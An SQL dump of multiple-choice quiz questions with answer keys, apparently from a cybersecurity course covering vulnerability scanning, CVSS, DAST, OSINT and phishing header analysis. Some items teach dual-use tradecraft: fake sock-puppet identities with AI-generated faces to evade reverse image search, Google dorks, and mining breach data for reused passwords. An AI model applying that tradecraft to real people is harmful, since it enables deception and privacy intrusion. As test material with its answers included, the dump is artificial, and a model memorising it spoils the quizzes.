(5716, 85, 'What is a common issue with \"Banner Grabbing\"?', 3, 'Banners can act or lie', 0, 'Inaccurate', '2025-12-26 22:11:01', '[\"It causes crashes\", \"Banners can act or lie\", \"It requires passwords\", \"It is too slow\"]'),
(5717, 86, 'What does \"AV:N\" stand for?', 1, 'Attack Vector: Network', 0, 'Remote', '2025-12-26 22:11:01', '[\"Attack Vector: None\", \"Attack Vector: Network\", \"Anti-Virus: None\", \"Admin View: No\"]'),
(5718, 86, 'Which metric indicates user interaction is NOT needed?', 2, 'UI:N', 0, 'Automatic', '2025-12-26 22:11:01', '[\"UI:R\", \"UI:N\", \"PR:N\", \"AV:L\"]'),
(5719, 86, 'A \"Scope Change\" (S:C) usually implies what?', 3, 'Breaking out of sandbox/VM', 0, 'Higher impact', '2025-12-26 22:11:01', '[\"Local only\", \"Breaking out of sandbox/VM\", \"Lower score\", \"Network only\"]'),
(5720, 87, 'Why should you place local scanners in each network segment?', 1, 'To avoid scanning through firewalls', 0, 'Efficiency', '2025-12-26 22:11:01', '[\"To waste money\", \"To avoid scanning through firewalls\", \"Because Nessus requires it\", \"To use more IPs\"]'),
(5721, 87, 'Which scan policy is best for solely finding live hosts?', 2, 'Host Discovery', 0, 'Ping sweep', '2025-12-26 22:11:01', '[\"Basic Network Scan\", \"Web App Scan\", \"Host Discovery\", \"Malware Scan\"]'),
(5722, 87, 'Why avoid scanning SCADA/Printers with aggressive policies?', 3, 'They are fragile and can crash', 0, 'Stability', '2025-12-26 22:11:01', '[\"They have no vulns\", \"They are fragile and can crash\", \"They are strictly read-only\", \"Nessus cannot scan them\"]'),
(5723, 88, 'If \"Exploit Available\" is Yes, what does that mean?', 1, 'Hackable tools exist publicly', 0, 'Urgent', '2025-12-26 22:11:01', '[\"It is theoretical\", \"Hackable tools exist publicly\", \"It is a zero-day\", \"It involves money\"]'),
(5724, 88, 'What does VPR add to the standard CVSS score?', 2, 'Real-world threat context', 0, 'Intel', '2025-12-26 22:11:01', '[\"Nothing\", \"Real-world threat context\", \"User opinion\", \"Randomness\"]'),
(5725, 88, 'What is the first filter you should typically apply?', 3, 'Severity (Crit/High)', 0, 'Triage', '2025-12-26 22:11:01', '[\"Low/Info\", \"Severity (Crit/High)\", \"Port 80\", \"Name\"]'),
(5726, 89, 'What is a \"Pilot\" group in patching?', 1, 'A small test subset of production', 0, 'Canary', '2025-12-26 22:11:01', '[\"The IT team\", \"A small test subset of production\", \"The CEO\", \"The printers\"]'),
(5727, 89, 'Why might you skip testing for an \"Emergency\" patch?', 2, 'Immediate exploitation risk', 0, 'Zero Day', '2025-12-26 22:11:01', '[\"Too lazy\", \"Immediate exploitation risk\", \"Patches never fail\", \"Vendor guarantee\"]'),
(5728, 89, 'What allows you to recover if a patch kills a server?', 3, 'Snapshots / Rollback Plan', 0, 'Backup', '2025-12-26 22:11:01', '[\"Reinstalling OS\", \"Snapshots / Rollback Plan\", \"SLA\", \"Vulnerability Scan\"]'),
(5729, 90, 'Who maintains the CVE list?', 1, 'MITRE', 0, 'Organization', '2025-12-26 22:11:01', '[\"Microsoft\", \"MITRE\", \"Google\", \"NSA\"]'),
(5730, 90, 'What is the difference between CVE and CWE?', 2, 'CVE is specific instance, CWE is category', 0, 'Instance vs Class', '2025-12-26 22:11:01', '[\"They are the same\", \"CVE is for Windows, CWE for Linux\", \"CVE is specific instance, CWE is category\", \"CWE is a score\"]'),
(5731, 90, 'What database adds scoring (CVSS) to the CVEs?', 3, 'NVD', 0, 'National Vuln DB', '2025-12-26 22:11:01', '[\"MITRE\", \"OWASP\", \"NVD\", \"CISA\"]'),
(5732, 91, 'Which strategy involves shutting down a risky system?', 1, 'Avoidance', 0, 'Stop activity', '2025-12-26 22:11:01', '[\"Acceptance\", \"Transference\", \"Avoidance\", \"Mitigation\"]'),
(5733, 91, 'Buying insurance is an example of?', 2, 'Transference', 0, 'Moving risk', '2025-12-26 22:11:01', '[\"Acceptance\", \"Avoidance\", \"Transference\", \"Patching\"]'),
(5734, 91, 'If you Accept a risk, what is usually required?', 3, 'Compensating Controls / Sign-off', 0, 'Paperwork', '2025-12-26 22:11:01', '[\"Nothing\", \"Compensating Controls / Sign-off\", \"Patching\", \"Ignoring it\"]'),
(5735, 92, 'Does DAST require source code access?', 1, 'No (Black Box)', 0, 'Dynamic', '2025-12-26 22:11:01', '[\"Yes\", \"No (Black Box)\", \"Sometimes\", \"Only for Javascript\"]'),
(5736, 92, 'Which testing method happens \"running\" against a live app?', 2, 'DAST', 0, 'Dynamic', '2025-12-26 22:11:01', '[\"SAST\", \"DAST\", \"Unit Testing\", \"Linting\"]'),
(5737, 92, 'Why is DAST considered \"Technology Agnostic\"?', 3, 'HTTP is universal', 0, 'Attacks inputs', '2025-12-26 22:11:01', '[\"It knows all languages\", \"HTTP is universal\", \"It compiles code\", \"It uses AI\"]'),
(5738, 93, 'Which vulnerability category covers IDOR (Insecure Direct Object Reference)?', 1, 'Broken Access Control', 0, 'Permissions', '2025-12-26 22:11:01', '[\"Injection\", \"Broken Access Control\", \"Cryptographic Failures\", \"Logging Failures\"]'),
(5739, 93, 'What is the best defense against Injection?', 2, 'Parameterized Queries', 0, 'Prepared Statements', '2025-12-26 22:11:01', '[\"Firewalls\", \"Parameterized Queries\", \"Encryption\", \"Antivirus\"]'),
(5740, 93, 'Storing passwords in plain text falls under which category?', 3, 'Cryptographic Failures', 0, 'Crypto', '2025-12-26 22:11:01', '[\"Injection\", \"Cryptographic Failures\", \"Access Control\", \"Design Flaws\"]'),
(5741, 94, 'What feature prevents ZAP from attacking the entire internet?', 1, 'Scope / Contexts', 0, 'Limits', '2025-12-26 22:11:01', '[\"Firewall\", \"Scope / Contexts\", \"VPN\", \"Cables\"]'),
(5742, 94, 'What is the ZAP HUD?', 2, 'Browser overlay for testing', 0, 'UI', '2025-12-26 22:11:01', '[\"A report format\", \"Browser overlay for testing\", \"A CI pipeline\", \"A virus\"]'),
(5743, 94, 'Can ZAP be integrated into CI/CD pipelines?', 3, 'Yes (Headless/Docker)', 0, 'Automation', '2025-12-26 22:11:01', '[\"No, GUI only\", \"Yes (Headless/Docker)\", \"Only on Windows\", \"Cost extra\"]'),
(5744, 95, 'Why do traditional spiders fail on React apps?', 1, 'Content loads via JS/DOM', 0, 'SPA', '2025-12-26 22:11:01', '[\"React is secure\", \"Content loads via JS/DOM\", \"URLs are encrypted\", \"Firewalls block them\"]'),
(5745, 95, 'What does an AJAX spider use to crawl?', 2, 'A headless browser', 0, 'Rendering', '2025-12-26 22:11:01', '[\"Curl\", \"Wget\", \"A headless browser\", \"Guessing\"]'),
(5746, 95, 'How might an attacker use robots.txt?', 3, 'To find hidden/disallowed paths', 0, 'Recon', '2025-12-26 22:11:01', '[\"To obey rules\", \"To find hidden/disallowed paths\", \"To crash server\", \"To find emails\"]'),
(5747, 96, 'Why is Active Scanning risky in Production?', 1, 'Can delete data or cause DoS', 0, 'Destructive', '2025-12-26 22:11:01', '[\"It is slow\", \"Can delete data or cause DoS\", \"It costs money\", \"It is illegal in Prod\"]'),
(5748, 96, 'How does a Time-Based SQLi test verify the vuln?', 2, 'Measures server delay', 0, 'Timing', '2025-12-26 22:11:01', '[\"Checks error text\", \"Measures server delay\", \"Crashing server\", \"Downloading DB\"]'),
(5749, 96, 'If a scanner hits a \"Contact Us\" form, what happens?', 3, 'Floods inbox with junk', 0, 'Spam', '2025-12-26 22:11:01', '[\"Nothing\", \"Floods inbox with junk\", \"Hacks email\", \"Server reboots\"]'),
(5750, 97, 'If a payload appears in the response, is it always XSS?', 1, 'No, headers/encoding matter', 0, 'False Positive', '2025-12-26 22:11:01', '[\"Yes\", \"No, headers/encoding matter\", \"Only in Chrome\", \"Never\"]'),
(5751, 97, 'Why do Custom 404 pages confuse scanners?', 2, 'They return 200 OK status', 0, 'Status Code', '2025-12-26 22:11:01', '[\"They are hidden\", \"They return 200 OK status\", \"They are slow\", \"They are encrypted\"]'),
(5752, 97, 'What defines a professional analyst reporting DAST results?', 3, 'Manual Verification', 0, 'Curating', '2025-12-26 22:11:01', '[\"Copy-Pasting\", \"Manual Verification\", \"Ignoring Lows\", \"Running in background\"]'),
(5753, 98, 'What is better than reporting 100 individual bugs?', 1, 'Reporting the systemic root cause', 0, 'Grouping', '2025-12-26 22:11:01', '[\"Reporting 1000 bugs\", \"Reporting the systemic root cause\", \"Ignoring them\", \"Quitting\"]'),
(5754, 98, 'What helps a developer understand \"Why\" they should fix it?', 2, 'Risk Explanation', 0, 'Impact', '2025-12-26 22:11:01', '[\"CVSS Score\", \"Risk Explanation\", \"Manager threats\", \"Compliance laws\"]'),
(5755, 98, 'What is a \"PoC\" in reporting?', 3, 'Proof of Concept (Reproduction steps)', 0, 'Evidence', '2025-12-26 22:11:01', '[\"Point of Contact\", \"Proof of Concept (Reproduction steps)\", \"Piece of Code\", \"Priority of Criticality\"]'),
(5756, 160, 'What is the verified first step in the Vulnerability Management Lifecycle?', 1, 'Asset Discovery', 0, 'Finding the machines', '2025-12-26 22:11:01', '[\"Remediation\", \"Asset Discovery\", \"Scanning\", \"Reporting\"]'),
(5757, 160, 'Why is \"Verification\" critical after patching?', 2, 'To ensure the patch actually fixed the issue', 0, 'Trust but verify', '2025-12-26 22:11:01', '[\"It increases billable hours\", \"To ensure the patch actually fixed the issue\", \"To verify the server is fast\", \"It is not critical\"]'),
(5758, 160, 'What term describes unknown/unmanaged systems on a network?', 3, 'Shadow IT', 0, 'Hidden', '2025-12-26 22:11:01', '[\"Dark Web\", \"Shadow IT\", \"Hidden Services\", \"Honeypots\"]'),
(5759, 160, 'Which scan type allows the scanner to log into the target?', 4, 'Authenticated Scan', 0, 'Credentialed', '2025-12-26 22:11:01', '[\"Unauthenticated Scan\", \"Stealth Scan\", \"Authenticated Scan\", \"Passive Scan\"]'),
(5760, 160, 'Which scan is better for an accurate inventory of installed software?', 5, 'Authenticated Scan', 0, 'Registry access', '2025-12-26 22:11:01', '[\"Unauthenticated Scan\", \"Port Scan\", \"Authenticated Scan\", \"Ping Sweep\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(5761, 160, 'What is the main drawback of relying on \"Banner Grabbing\"?', 6, 'Banners can be fake or suppressed', 0, 'Accuracy', '2025-12-26 22:11:01', '[\"It is illegal\", \"Banners can be fake or suppressed\", \"It crashes servers\", \"It takes too long\"]'),
(5762, 160, 'In CVSS, what does \"AV:N\" indicate?', 7, 'Attack Vector: Network', 0, 'Remote', '2025-12-26 22:11:01', '[\"Attack Vector: None\", \"Attack Vector: Network\", \"Anti-Virus: None\", \"Available: No\"]'),
(5763, 160, 'Which CVSS metric measures if the attacker needs someone to click a link?', 8, 'User Interaction (UI)', 0, 'Interaction', '2025-12-26 22:11:01', '[\"Privileges Required (PR)\", \"Attack Complexity (AC)\", \"User Interaction (UI)\", \"Scope (S)\"]'),
(5764, 160, 'A \"Scope Change\" (S:C) in CVSS means expecting what?', 9, 'Impact extending beyond the vulnerable component', 0, 'VM Escape', '2025-12-26 22:11:01', '[\"Impact extending beyond the vulnerable component\", \"Scope is confidential\", \"System crash\", \"No impact\"]'),
(5765, 160, 'Where should you place a scanner to avoid firewall interference?', 10, 'In the same network segment/zone as the target', 0, 'Local', '2025-12-26 22:11:01', '[\"On the internet\", \"In the same network segment/zone as the target\", \"In the DMZ only\", \"On a distinct VLAN\"]'),
(5766, 160, 'Which scan policy determines if a host is simply alive?', 11, 'Host Discovery', 0, 'Ping', '2025-12-26 22:11:01', '[\"Basic Network Scan\", \"Host Discovery\", \"Malware Scan\", \"Web App Scan\"]'),
(5767, 160, 'Why do we avoid aggressive scans on SCADA/ICS systems?', 12, 'They are fragile and may crash', 0, 'Availability', '2025-12-26 22:11:01', '[\"They are secure by default\", \"They are fragile and may crash\", \"They are mostly air-gapped\", \"Nessus cannot see them\"]'),
(5768, 160, 'What is the most important attribute when prioritizing patches?', 13, 'Exploitability (Is there a script?)', 0, 'Risk', '2025-12-26 22:11:01', '[\"CVSS Score only\", \"Alphabetical Order\", \"Exploitability (Is there a script?)\", \"Vendor Name\"]'),
(5769, 160, 'What does Tenable VPR add to the analysis?', 14, 'Real-time threat context', 0, 'Prediction', '2025-12-26 22:11:01', '[\"Nothing\", \"Real-time threat context\", \"Color coding\", \"PDF export\"]'),
(5770, 160, 'What is an \"Emergency\" patch typically reserved for?', 15, 'Zero-Day exploits', 0, 'Log4j scenario', '2025-12-26 22:11:01', '[\"Routine updates\", \"Feature releases\", \"Zero-Day exploits\", \"UI fixes\"]'),
(5771, 160, 'Why must you have a \"Rollback Plan\" before patching?', 16, 'To recover if the patch breaks the server', 0, 'Safety', '2025-12-26 22:11:01', '[\"To uninstall viruses\", \"To recover if the patch breaks the server\", \"Compliance requires it\", \"It is optional\"]'),
(5772, 160, 'Who maintains the official CVE list?', 17, 'MITRE', 0, 'The list owner', '2025-12-26 22:11:01', '[\"NIST\", \"MITRE\", \"Microsoft\", \"Google\"]'),
(5773, 160, 'What is the difference between CVE and CWE?', 18, 'CVE is the specific flaw, CWE is the category', 0, 'Instance vs Type', '2025-12-26 22:11:01', '[\"They are identical\", \"CVE is for software, CWE for hardware\", \"CVE is the specific flaw, CWE is the category\", \"CWE is the score\"]'),
(5774, 160, 'If you cannot patch a system, but isolate it with a firewall, this is called?', 19, 'Remediation (Mitigation)', 0, 'Compensating Control', '2025-12-26 22:11:01', '[\"Acceptance\", \"Remediation (Mitigation)\", \"Transference\", \"Avoidance\"]'),
(5775, 160, 'Buying Cyber Insurance is an example of which risk strategy?', 20, 'Transference', 0, 'Shifting costs', '2025-12-26 22:11:01', '[\"Avoidance\", \"Acceptance\", \"Transference\", \"Mitigation\"]'),
(5776, 181, 'What is the defining characteristic of OSINT?', 1, 'It uses publicly available information', 0, 'Public', '2025-12-26 22:15:15', '[\"It uses hacking tools\", \"It uses spy satellites\", \"It uses publicly available information\", \"It is always illegal\"]'),
(5777, 181, 'Is browsing a company\'s public website considered \"Hacking\"?', 2, 'No, it is Passive OSINT', 0, 'Passive', '2025-12-26 22:15:15', '[\"Yes, immediately\", \"No, it is Passive OSINT\", \"Only if you use Chrome\", \"Only if using VPN\"]'),
(5778, 181, 'Which method gives you information without alerting the target?', 3, 'Passive Reconnaissance', 0, 'Quiet', '2025-12-26 22:15:15', '[\"Active Scanning\", \"Passive Reconnaissance\", \"Phishing\", \"DDoS\"]'),
(5779, 182, 'What is the first step of the Intelligence Cycle?', 1, 'Planning & Direction', 0, 'Goal setting', '2025-12-26 22:15:15', '[\"Collection\", \"Planning & Direction\", \"Analysis\", \"Hacking\"]'),
(5780, 182, 'In which phase do you \"connect the dots\" to form a conclusion?', 2, 'Analysis', 0, 'Thinking', '2025-12-26 22:15:15', '[\"Collection\", \"Analysis\", \"Processing\", \"Scanning\"]'),
(5781, 182, 'What is the output of the \"Collection\" phase?', 3, 'Raw Data', 0, 'Unsorted stuff', '2025-12-26 22:15:15', '[\"Finished Report\", \"Raw Data\", \"Intelligence\", \"Arrests\"]'),
(5782, 183, 'What is a \"Sock Puppet\" in OSINT?', 1, 'A fake online identity', 0, 'Disguise', '2025-12-26 22:15:15', '[\"A hand puppet\", \"A fake online identity\", \"A hacking tool\", \"A VPN protocol\"]'),
(5783, 183, 'Why should you verify your VPN before starting?', 2, 'To hide your Source IP from the target', 0, 'Anonymity', '2025-12-26 22:15:15', '[\"To make internet faster\", \"To hide your Source IP from the target\", \"To access Netflix\", \"To save battery\"]'),
(5784, 183, 'Why use an AI-generated face for a fake profile?', 3, 'Avoids Reverse Image Search detection', 0, 'Uniqueness', '2025-12-26 22:15:15', '[\"It looks better\", \"Avoids Reverse Image Search detection\", \"Real photos are illegal\", \"It is faster\"]'),
(5785, 184, 'Which operator restricts results to a specific website?', 1, 'site:', 0, 'Domain limit', '2025-12-26 22:15:16', '[\"host:\", \"site:\", \"www:\", \"map:\"]'),
(5786, 184, 'How do you find specifically PDF files?', 2, 'filetype:pdf', 0, 'File extension', '2025-12-26 22:15:16', '[\"pdf:\", \"filetype:pdf\", \"ext:adobe\", \"doc:pdf\"]'),
(5787, 184, 'What does `intitle:\"index of\"` typically reveal?', 3, 'Open Directory Listings', 0, 'A list of files', '2025-12-26 22:15:16', '[\"The homepage\", \"Open Directory Listings\", \"Google Maps\", \"DNS records\"]'),
(5788, 185, 'What concept relies on users choosing the same handle everywhere?', 1, 'Username Correlation', 0, 'Reuse', '2025-12-26 22:15:16', '[\"Password Reuse\", \"Username Correlation\", \"Identity Theft\", \"Phishing\"]'),
(5789, 185, 'Which tool checks a username across hundreds of sites?', 2, 'Sherlock', 0, 'Detective', '2025-12-26 22:15:16', '[\"Nmap\", \"Sherlock\", \"Wireshark\", \"Metasploit\"]'),
(5790, 185, 'If a user deletes a post, where might you still find it?', 3, 'Wayback Machine / Archive', 0, 'Time travel', '2025-12-26 22:15:16', '[\"Recycle Bin\", \"Wayback Machine / Archive\", \"Dark Web\", \"Nowhere\"]'),
(5791, 186, 'What does \"HaveIBeenPwned\" tell you?', 1, 'If an email was part of a known breach', 0, 'Leak status', '2025-12-26 22:15:16', '[\"The user\'s password\", \"If an email was part of a known breach\", \"The user\'s location\", \"The user\'s bank\"]'),
(5792, 186, 'What is Hunter.io primarily used for?', 2, 'Finding corporate email formats', 0, 'Business emails', '2025-12-26 22:15:16', '[\"Hacking wifi\", \"Finding corporate email formats\", \"Tracing phones\", \"Buying guns\"]'),
(5793, 186, 'Why is old breach data useful?', 3, 'Password reuse', 0, 'Habits', '2025-12-26 22:15:16', '[\"It isn\'t\", \"Password reuse\", \" blackmail\", \"It proves they are dumb\"]'),
(5794, 187, 'What hidden data in a photo might reveal location?', 1, 'EXIF / GPS Data', 0, 'Metadata', '2025-12-26 22:15:16', '[\"Pixels\", \"EXIF / GPS Data\", \"Color profile\", \"File name\"]'),
(5795, 187, 'Which search engine is famous for its facial recognition capabilities?', 2, 'Yandex', 0, 'Russian one', '2025-12-26 22:15:16', '[\"Bing\", \"DuckDuckGo\", \"Yandex\", \"Yahoo\"]'),
(5796, 187, 'What does Reverse Image Search help you find?', 3, 'Where else the image appears online', 0, 'Sources', '2025-12-26 22:15:16', '[\"The person\'s name\", \"Where else the image appears online\", \"The camera model\", \"The password\"]'),
(5797, 188, 'What record functions as the \"birth certificate\" of a domain?', 1, 'WHOIS', 0, 'Registration', '2025-12-26 22:15:16', '[\"DNS\", \"WHOIS\", \"SSL\", \"HTTP\"]'),
(5798, 188, 'Why do we look for subdomains like \"dev.example.com\"?', 2, 'Often less secure / testing environments', 0, 'Weak targets', '2025-12-26 22:15:16', '[\"They look cool\", \"Often less secure / testing environments\", \"They represent the CEO\", \"They are faster\"]'),
(5799, 188, 'What does \"BuiltWith\" tell you?', 3, 'The technology stack used', 0, 'Tech', '2025-12-26 22:15:16', '[\"Who owns it\", \"The technology stack used\", \"The password\", \"The bugs\"]'),
(5800, 189, 'What tool maps Wifi SSIDs to GPS coordinates?', 1, 'Wigle.net', 0, 'Wifi map', '2025-12-26 22:15:16', '[\"Google Maps\", \"Wigle.net\", \"Shodan\", \"WifiCracker\"]'),
(5801, 189, 'What feature of Google Earth helps verify \"When\" a satellite image was taken?', 2, 'Historical Imagery', 0, 'Timeline', '2025-12-26 22:15:16', '[\"Street View\", \"Historical Imagery\", \"3D Buildings\", \"Atmosphere\"]'),
(5802, 189, 'How can SunCalc help in IMINT?', 3, 'Determine time of day from shadows', 0, 'Shadows', '2025-12-26 22:15:16', '[\"Find the weather\", \"Determine time of day from shadows\", \"Find solar panels\", \"Navigate\"]'),
(5803, 190, 'What does OSINT stand for?', 1, 'Open Source Intelligence', 0, 'Open Source', '2025-12-26 22:15:16', '[\"Open Source Intelligence\", \"Overseas Intelligence\", \"Online Security INTerface\", \"Open System Integration\"]'),
(5804, 190, 'Is Passive OSINT illegal?', 2, 'Generally No (accessing public data)', 0, 'No', '2025-12-26 22:15:16', '[\"Yes, always\", \"Generally No (accessing public data)\", \"Only in Europe\", \"Only for police\"]'),
(5805, 190, 'What is the best way to protect your identity during research?', 3, 'Use a Sock Puppet and VPN', 0, 'OPSEC', '2025-12-26 22:15:16', '[\"Clear cookies\", \"Use a Sock Puppet and VPN\", \"Use Incognito Mode\", \"Ask permission\"]'),
(5806, 190, 'Which Google Dork finds Excel files?', 4, 'filetype:xlsx', 0, 'Spreadsheet', '2025-12-26 22:15:16', '[\"file:excel\", \"filetype:xlsx\", \"type:xls\", \"ext:sheet\"]'),
(5807, 190, 'Which operator searches for text inside the URL?', 5, 'inurl:', 0, 'URL text', '2025-12-26 22:15:16', '[\"site:\", \"inurl:\", \"link:\", \"addr:\"]'),
(5808, 190, 'If you want to view a deleted page, what Google operator helps?', 6, 'cache:', 0, 'Snapshot', '2025-12-26 22:15:16', '[\"history:\", \"cache:\", \"old:\", \"back:\"]'),
(5809, 190, 'Which tool is best for checking username reuse across 300+ sites?', 7, 'Sherlock', 0, 'Python script', '2025-12-26 22:15:16', '[\"Nessus\", \"Sherlock\", \"John the Ripper\", \"Wireshark\"]'),
(5810, 190, 'What service helps you find the email format for a company (e.g., first.last)?', 8, 'Hunter.io', 0, 'Email patterns', '2025-12-26 22:15:16', '[\"HaveIBeenPwned\", \"Hunter.io\", \"Gmail\", \"Outlook\"]'),
(5811, 190, 'What does \"HaveIBeenPwned\" check?', 9, 'If an email is in a known data breach', 0, 'Breaches', '2025-12-26 22:15:16', '[\"The email password\", \"If an email is in a known data breach\", \"If the email is valid\", \"Who owns the email\"]'),
(5812, 190, 'Which search engine is preferred for facial recognition checks?', 10, 'Yandex', 0, 'Russian AI', '2025-12-26 22:15:16', '[\"Bing\", \"Google\", \"Yandex\", \"DuckDuckGo\"]'),
(5813, 190, 'What metadata in a photo provides GPS coordinates?', 11, 'EXIF', 0, 'Tags', '2025-12-26 22:15:16', '[\"Pixel\", \"EXIF\", \"PNG\", \"Stenography\"]'),
(5814, 190, 'What tool lets you search for Wifi hotspots by SSID?', 12, 'Wigle.net', 0, 'War driving DB', '2025-12-26 22:15:16', '[\"WifiMap\", \"Wigle.net\", \"Google Wifi\", \"NetStumbler\"]'),
(5815, 190, 'What record tells you who owns a domain name?', 13, 'WHOIS', 0, 'Registry', '2025-12-26 22:15:16', '[\"DNS\", \"WHOIS\", \"ARP\", \"DHCP\"]'),
(5816, 190, 'What tool visualizes domain infrastructure and subdomains as a graph?', 14, 'DNSDumpster', 0, 'Graph', '2025-12-26 22:15:16', '[\"Nmap\", \"DNSDumpster\", \"Ping\", \"Traceroute\"]'),
(5817, 190, 'Why are subdomains like \"dev\" or \"staging\" valuable targets?', 15, 'Often have weaker security/config', 0, 'Forgotten', '2025-12-26 22:15:16', '[\"They are faster\", \"Often have weaker security/config\", \"They are public\", \"They have more money\"]'),
(5818, 190, 'What is the \"Intelligence Cycle\" step where you interpret data?', 16, 'Analysis', 0, 'Reasoning', '2025-12-26 22:15:16', '[\"Collection\", \"Analysis\", \"Planning\", \"Filing\"]'),
(5819, 190, 'What is a \"Grey Hat\" OSINT source?', 17, 'Semi-legal/paid breach data sites', 0, 'DeHashed', '2025-12-26 22:15:16', '[\"Government sites\", \"Semi-legal/paid breach data sites\", \"News sites\", \"Libraries\"]'),
(5820, 190, 'Why should you verify \"Sock Puppets\" with a burner phone?', 18, 'Platforms require SMS verification', 0, '2FA', '2025-12-26 22:15:16', '[\"To call the target\", \"Platforms require SMS verification\", \"To look cool\", \"It is cheaper\"]'),
(5821, 190, 'What is \"Google Hacking\"?', 19, 'Using advanced operators to find sensitive info', 0, 'Dorking', '2025-12-26 22:15:16', '[\"Hacking Google servers\", \"Using advanced operators to find sensitive info\", \"Phishing Google employees\", \"Using Chrome\"]'),
(5822, 190, 'What is the primary risk of \"Active\" recon (like port scanning)?', 20, 'It generates logs/alerts on the target', 0, 'Detection', '2025-12-26 22:15:16', '[\"It is slow\", \"It generates logs/alerts on the target\", \"It costs money\", \"Nothing\"]'),
(5823, 191, 'Which header field usually matches the actual Envelope Sender?', 1, 'Return-Path', 0, 'Return', '2025-12-26 22:17:47', '[\"Reply-To\", \"Return-Path\", \"From\", \"Subject\"]'),
(5824, 191, 'If \"From\" is \"ceo@company.com\" but \"Return-Path\" is \"hacker@gmail.com\", what is this called?', 2, 'Spoofing', 0, 'Mismatch', '2025-12-26 22:17:47', '[\"Phishing\", \"Spoofing\", \"Spam\", \"Relaying\"]'),
(5825, 191, 'Are \"Message Headers\" authenticated by default?', 3, 'No, they can be easily faked', 0, 'No', '2025-12-26 22:17:47', '[\"Yes, strictly\", \"No, they can be easily faked\", \"Only on Gmail\", \"Only on Outlook\"]'),
(5826, 192, 'Which protocol uses a DNS list of allowed Sender IPs?', 1, 'SPF', 0, 'Sender Policy', '2025-12-26 22:17:47', '[\"SPF\", \"DKIM\", \"DMARC\", \"POP3\"]'),
(5827, 192, 'What does DKIM prevent?', 2, 'Tampering / Modification', 0, 'Integrity', '2025-12-26 22:17:47', '[\"Spoofing IP\", \"Tampering / Modification\", \"Spam\", \"Viruses\"]'),
(5828, 192, 'If DMARC policy is \"p=reject\", what happens to spoofed emails?', 3, 'They are blocked/deleted', 0, 'Reject', '2025-12-26 22:17:47', '[\"Delivered to Inbox\", \"Sent to Spam\", \"They are blocked/deleted\", \"Returned to sender\"]'),
(5829, 193, 'What is \"Typosquatting\"?', 1, 'Registering a domain that looks like the real one', 0, 'Misspelling', '2025-12-26 22:17:47', '[\"Hacking DNS\", \"Registering a domain that looks like the real one\", \"Stealing passwords\", \"Deleting data\"]'),
(5830, 193, 'The \"From\" header says \"tesla-corp.io\". Why is this suspicious?', 2, 'It is not the official trusted domain', 0, 'Fake domain', '2025-12-26 22:17:47', '[\"It is too long\", \"It is not the official trusted domain\", \"It uses hyphens\", \"It is fine\"]'),
(5831, 193, 'What psychological trigger is used in \"URGENT WIRE TRANSFER\"?', 3, 'Urgency / Panic', 0, 'Fear', '2025-12-26 22:17:47', '[\"Greed\", \"Urgency / Panic\", \"Curiosity\", \"Authority\"]'),
(5832, 194, 'Why is \"file.pdf.exe\" dangerous?', 1, 'Windows hides the .exe extension', 0, 'Double extension', '2025-12-26 22:17:47', '[\"It is a PDF\", \"Windows hides the .exe extension\", \"It is corrupt\", \"It is encrypted\"]'),
(5833, 194, 'What is the first safe step when you have a suspicious file?', 2, 'Hash it and check VirusTotal', 0, 'Hashing', '2025-12-26 22:17:47', '[\"Open it\", \"Hash it and check VirusTotal\", \"Email it to IT\", \"Rename it\"]'),
(5834, 194, 'What does \"X-PHP-Originating-Script\" usually indicate?', 3, 'Sent via a web script/bot', 0, 'Automated', '2025-12-26 22:17:47', '[\"Sent by Outlook\", \"Sent via a web script/bot\", \"Sent by Gmail\", \"Legitimate marketing\"]'),
(5835, 195, 'What does \"Defanging\" a URL mean?', 1, 'Making it unclickable', 0, 'Safety', '2025-12-26 22:17:47', '[\"Deleting it\", \"Making it unclickable\", \"Encrypting it\", \"Clicking it\"]'),
(5836, 195, 'If SPF fails for \"microsoft.com\", what does it mean?', 2, 'The sender IP is not Microsoft', 0, 'Spoofing', '2025-12-26 22:17:47', '[\"Microsoft is down\", \"The sender IP is not Microsoft\", \"The email is legitimate\", \"DNS is broken\"]'),
(5837, 195, 'What is suspicious about \"login.microsoft.com.xyz\"?', 3, 'The TLD is .xyz, not .com', 0, 'Fake domain', '2025-12-26 22:17:47', '[\"It is too short\", \"The TLD is .xyz, not .com\", \"It contains login\", \"It is secure\"]'),
(5838, 196, 'What is the TRUE sender address (Return-Path)?', 1, 'support-ticket-882@gmail.com', 0, 'Return Path', '2025-12-26 22:17:47', '[\"admin@company.com\", \"support-ticket-882@gmail.com\", \"victim@company.com\", \"mail.attacker-infrastructure.net\"]'),
(5839, 196, 'Who does the email CLAIM to be from (Display Name)?', 2, 'IT Service Desk', 0, 'Fake Name', '2025-12-26 22:17:47', '[\"Support Ticket\", \"IT Service Desk\", \"Gmail Team\", \"HR\"]'),
(5840, 196, 'Look at the X-Mailer. What software sent this?', 3, 'OstroMail v1.2 (Mass Mailer)', 0, 'Mass Mailer', '2025-12-26 22:17:47', '[\"Outlook\", \"Gmail\", \"OstroMail v1.2 (Mass Mailer)\", \"iPhone Mail\"]'),
(5841, 196, 'Did SPF pass or fail?', 4, 'Pass', 0, 'Pass', '2025-12-26 22:17:47', '[\"Fail\", \"SoftFail\", \"Pass\", \"Neutral\"]'),
(5842, 196, 'Why is this suspicious, despite SPF passing?', 5, 'Sender authenticated as Gmail, but spoofed Company header', 0, 'Mismatch', '2025-12-26 22:17:47', '[\"SPF failed\", \"Sender authenticated as Gmail, but spoofed Company header\", \"It came from Microsoft\", \"The date is wrong\"]'),
(5843, 201, 'Which principle relies on the target\'s fear of disobeying a superior?', 1, 'Authority', 0, 'Boss', '2025-12-26 22:28:54', '[\"Reciprocity\", \"Authority\", \"Liking\", \"Consistency\"]'),
(5844, 201, '\"Act now or lose your account!\" exploits which psychological trigger?', 2, 'Urgency / Scarcity', 0, 'Panic', '2025-12-26 22:28:54', '[\"Trust\", \"Urgency / Scarcity\", \"Social Proof\", \"Kindness\"]'),
(5845, 201, 'What is the best immediate defense when you feel \"rushed\" by a request?', 3, 'Stop and Verify', 0, 'Pause', '2025-12-26 22:28:54', '[\"Do it quickly\", \"Stop and Verify\", \"Argue\", \"Ignore it\"]'),
(5846, 202, 'What is \"Pretexting\"?', 1, 'Creating a fake scenario to trick a victim', 0, 'Story', '2025-12-26 22:28:54', '[\"Guessing passwords\", \"Creating a fake scenario to trick a victim\", \"Scanning ports\", \"Coding malware\"]'),
